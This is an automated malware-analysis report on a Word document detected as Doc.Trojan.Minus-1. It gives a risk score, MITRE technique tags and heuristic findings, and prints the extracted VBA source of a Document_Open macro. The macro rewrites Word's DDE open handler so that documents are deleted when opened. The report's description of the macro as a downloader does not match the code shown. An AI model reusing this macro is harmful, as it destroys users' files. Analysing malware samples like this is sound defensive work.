MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a strong indicator of malicious intent. The macro attempts to write to the registry key HKEY_CLASSES_ROOT\Word.Document.8\shell\Open\ddeexec, likely to establish a mechanism for executing further malicious code. This behavior is consistent with a macro-based downloader.
Heuristics 3
-
ClamAV: Doc.Trojan.Minus-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Minus-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 547 bytes |
SHA-256: 3e871dfa72ad78e692d1ea97cc54bb93bab381035db7b44754ce9d748a3572bf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8\shell\Open\ddeexec", "") = "['DDE-Bacteria][On Error Resume Next][Kill(""%1"")]": End Sub 'VOVAN//SMF
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.